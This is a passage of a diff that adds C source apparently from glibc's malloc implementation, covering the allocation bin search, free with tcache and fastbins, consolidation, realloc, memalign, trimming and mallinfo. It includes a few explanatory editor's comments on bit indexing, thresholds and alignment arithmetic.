+	  return tcache_get (tc_idx);
+	}
+#endif
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
+          if ((victim = first (bin)) != bin
+	      && (unsigned long) chunksize_nomask (victim)
+	        >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin)
+		  && chunksize_nomask (victim)
+		    == chunksize_nomask (victim->fd))
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+                  if (__glibc_unlikely (fwd->bk != bck))
+                    {
+                      errstr = "malloc(): corrupted unsorted chunks";
+                      goto errout;
+                    }
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
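+      /* Illustrative note (editor's addition): the binmap keeps one bit per
+         bin, 32 bins per word with the usual BINMAPSHIFT of 5, so idx2block
+         selects the word (idx >> BINMAPSHIFT) and idx2bit the bit within it;
+         e.g. idx == 70 lands in block 2, bit 1 << 6.  */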
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+                  if (__glibc_unlikely (fwd->bk != bck))
+                    {
+                      errstr = "malloc(): corrupted unsorted chunks 2";
+                      goto errout;
+                    }
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
+
+      victim = av->top;
+      size = chunksize (victim);
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (have_fastchunks (av))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
+
+/*
+   ------------------------------ free ------------------------------
+ */
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  const char *errstr = NULL;
+  int locked = 0;
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wraps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    {
+      errstr = "free(): invalid pointer";
+    errout:
+      if (!have_lock && locked)
+        __libc_lock_unlock (av->mutex);
+      malloc_printerr (check_action, errstr, chunk2mem (p), av);
+      return;
+    }
+  /* We know that each chunk is at least MINSIZE bytes in size and a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    {
+      errstr = "free(): invalid size";
+      goto errout;
+    }
+
+  check_inuse_chunk(av, p);
+
+#if USE_TCACHE
+  {
+    size_t tc_idx = csize2tidx (size);
+
+    if (tcache
+	&& tc_idx < mp_.tcache_bins
+	&& tcache->counts[tc_idx] < mp_.tcache_count)
+      {
+	tcache_put (p, tc_idx);
+	return;
+      }
+  }
+#endif
+
+  /*
+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
+			  <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	/* We might not have a lock at this point and concurrent modifications
+	   of system_mem might have led to a false positive.  Redo the test
+	   after getting the lock.  */
+	if (have_lock
+	    || ({ assert (locked == 0);
+		  __libc_lock_lock (av->mutex);
+		  locked = 1;
+		  chunksize_nomask (chunk_at_offset (p, size)) <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem;
+	      }))
+	  {
+	    errstr = "free(): invalid next size (fast)";
+	    goto errout;
+	  }
+	if (! have_lock)
+	  {
+	    __libc_lock_unlock (av->mutex);
+	    locked = 0;
+	  }
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    set_fastchunks(av);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+    unsigned int old_idx = ~0u;
+    do
+      {
+	/* Check that the top of the bin is not the record we are going to add
+	   (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  {
+	    errstr = "double free or corruption (fasttop)";
+	    goto errout;
+	  }
+	/* Check that size of fastbin chunk at the top is the same as
+	   size of the chunk that we are adding.  We can dereference OLD
+	   only if we have the lock, otherwise it might have already been
+	   deallocated.  See use of OLD_IDX below for the actual check.  */
+	if (have_lock && old != NULL)
+	  old_idx = fastbin_index(chunksize(old));
+	p->fd = old2 = old;
+      }
+    while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2);
+
+    if (have_lock && old != NULL && __builtin_expect (old_idx != idx, 0))
+      {
+	errstr = "invalid fastbin entry (free)";
+	goto errout;
+      }
+  }
+
+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+    if (! have_lock) {
+      __libc_lock_lock (av->mutex);
+      locked = 1;
+    }
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      {
+	errstr = "double free or corruption (top)";
+	goto errout;
+      }
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+      {
+	errstr = "double free or corruption (out)";
+	goto errout;
+      }
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      {
+	errstr = "double free or corruption (!prev)";
+	goto errout;
+      }
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      {
+	errstr = "free(): invalid next size (normal)";
+	goto errout;
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = prev_size (p);
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      unlink(av, p, bck, fwd);
+    }
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink(av, nextchunk, bck, fwd);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	{
+	  errstr = "free(): corrupted unsorted chunks";
+	  goto errout;
+	}
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
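+    /* Editor's note: FASTBIN_CONSOLIDATION_THRESHOLD is 64 KiB here, so a
+       single free whose coalesced size reaches that value is enough to flush
+       every fastbin via malloc_consolidate and then consider trimming;
+       smaller frees leave the fastbins alone.  */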
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (have_fastchunks(av))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (! have_lock) {
+      assert (locked);
+      __libc_lock_unlock (av->mutex);
+    }
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
+
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+
+  Also, because this routine needs to be called the first time through
+  malloc anyway, it turns out to be the perfect place to trigger
+  initialization code.
+*/
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
+  mchunkptr       nextchunk;
+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+  mchunkptr       bck;
+  mchunkptr       fwd;
+
+  /*
+    If max_fast is 0, we know that av hasn't
+    yet been initialized, in which case do so below
+  */
+
+  if (get_max_fast () != 0) {
+    clear_fastchunks(av);
+
+    unsorted_bin = unsorted_chunks(av);
+
+    /*
+      Remove each chunk from fast bin and consolidate it, placing it
+      then in unsorted bin. Among other reasons for doing this,
+      placing in unsorted bin avoids needing to calculate actual bins
+      until malloc is sure that chunks aren't immediately going to be
+      reused anyway.
+    */
+
+    maxfb = &fastbin (av, NFASTBINS - 1);
+    fb = &fastbin (av, 0);
+    do {
+      p = atomic_exchange_acq (fb, NULL);
+      if (p != 0) {
+	do {
+	  check_inuse_chunk(av, p);
+	  nextp = p->fd;
+
+	  /* Slightly streamlined version of consolidation code in free() */
+	  size = chunksize (p);
+	  nextchunk = chunk_at_offset(p, size);
+	  nextsize = chunksize(nextchunk);
+
+	  if (!prev_inuse(p)) {
+	    prevsize = prev_size (p);
+	    size += prevsize;
+	    p = chunk_at_offset(p, -((long) prevsize));
+	    unlink(av, p, bck, fwd);
+	  }
+
+	  if (nextchunk != av->top) {
+	    nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	    if (!nextinuse) {
+	      size += nextsize;
+	      unlink(av, nextchunk, bck, fwd);
+	    } else
+	      clear_inuse_bit_at_offset(nextchunk, 0);
+
+	    first_unsorted = unsorted_bin->fd;
+	    unsorted_bin->fd = p;
+	    first_unsorted->bk = p;
+
+	    if (!in_smallbin_range (size)) {
+	      p->fd_nextsize = NULL;
+	      p->bk_nextsize = NULL;
+	    }
+
+	    set_head(p, size | PREV_INUSE);
+	    p->bk = unsorted_bin;
+	    p->fd = first_unsorted;
+	    set_foot(p, size);
+	  }
+
+	  else {
+	    size += nextsize;
+	    set_head(p, size | PREV_INUSE);
+	    av->top = p;
+	  }
+
+	} while ( (p = nextp) != 0);
+
+      }
+    } while (fb++ != maxfb);
+  }
+  else {
+    malloc_init_state(av);
+    check_malloc_state(av);
+  }
+}
+
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  mchunkptr        bck;             /* misc temp for linking */
+  mchunkptr        fwd;             /* misc temp for linking */
+
+  unsigned long    copysize;        /* bytes to copy */
+  unsigned int     ncopies;         /* INTERNAL_SIZE_T words to copy */
+  INTERNAL_SIZE_T* s;               /* copy source */
+  INTERNAL_SIZE_T* d;               /* copy destination */
+
+  const char *errstr = NULL;
+
+  /* oldmem size */
+  if (__builtin_expect (chunksize_nomask (oldp) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    {
+      errstr = "realloc(): invalid old size";
+    errout:
+      malloc_printerr (check_action, errstr, chunk2mem (oldp), av);
+      return NULL;
+    }
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (chunksize_nomask (next) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    {
+      errstr = "realloc(): invalid next size";
+      goto errout;
+    }
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink (av, next, bck, fwd);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+              /*
+                 Unroll copy of <= 36 bytes (72 if 8byte sizes)
+                 We know that contents have an odd number of
+                 INTERNAL_SIZE_T-sized words; minimally 3.
+               */
+
+              copysize = oldsize - SIZE_SZ;
+              s = (INTERNAL_SIZE_T *) (chunk2mem (oldp));
+              d = (INTERNAL_SIZE_T *) (newmem);
+              ncopies = copysize / sizeof (INTERNAL_SIZE_T);
+              assert (ncopies >= 3);
+
+              if (ncopies > 9)
+                memcpy (d, s, copysize);
+
+              else
+                {
+                  *(d + 0) = *(s + 0);
+                  *(d + 1) = *(s + 1);
+                  *(d + 2) = *(s + 2);
+                  if (ncopies > 4)
+                    {
+                      *(d + 3) = *(s + 3);
+                      *(d + 4) = *(s + 4);
+                      if (ncopies > 6)
+                        {
+                          *(d + 5) = *(s + 5);
+                          *(d + 6) = *(s + 6);
+                          if (ncopies > 8)
+                            {
+                              *(d + 7) = *(s + 7);
+                              *(d + 8) = *(s + 8);
+                            }
+                        }
+                    }
+                }
+
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
+
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  checked_request2size (bytes, nb);
+
+  /*
+     Strategy: find a spot within that chunk that meets the alignment
+     request, and then possibly free the leading and trailing space.
+   */
+
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+
+    { /*
+                Find an aligned spot inside chunk.  Since we need to give back
+                leading space in a chunk of at least MINSIZE, if the first
+                calculation places us at a spot with less than MINSIZE leader,
+                we can move to the next aligned spot -- we've allocated enough
+                total room so that this is always possible.
+                 */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          set_prev_size (newp, prev_size (p) + leadsize);
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
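+
+/*
+  For illustration only: the expression ((m + alignment - 1) & -alignment)
+  used above is the standard round-up-to-a-power-of-two idiom.  A minimal
+  stand-alone sketch of the same arithmetic (assuming a 64-bit target; the
+  align_up() helper is hypothetical and not part of this file):
+
+    #include <assert.h>
+    #include <stdint.h>
+
+    // Round addr up to the next multiple of align, where align is a
+    // power of two; -align has the same bit pattern as ~(align - 1).
+    static uintptr_t align_up (uintptr_t addr, uintptr_t align)
+    {
+      return (addr + align - 1) & -align;
+    }
+
+    int main (void)
+    {
+      assert (align_up (0x5010, 0x100) == 0x5100);  // rounded up
+      assert (align_up (0x5100, 0x100) == 0x5100);  // already aligned
+      return 0;
+    }
+*/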
+
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Don't touch corrupt arenas.  */
+  if (arena_is_corrupt (av))
+    return 0;
+
+  /* Ensure initialization/consolidation */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
+                  {
+#if MALLOC_DEBUG
+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
+
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+	{
+	  if (DUMPED_MAIN_ARENA_CHUNK (p))
+	    return chunksize (p) - SIZE_SZ;
+	  else
+	    return chunksize (p) - 2 * SIZE_SZ;
+	}
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
+
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  /* Ensure initialization */
+  if (av->top == 0)
+    malloc_consolidate (av);
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = 0;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
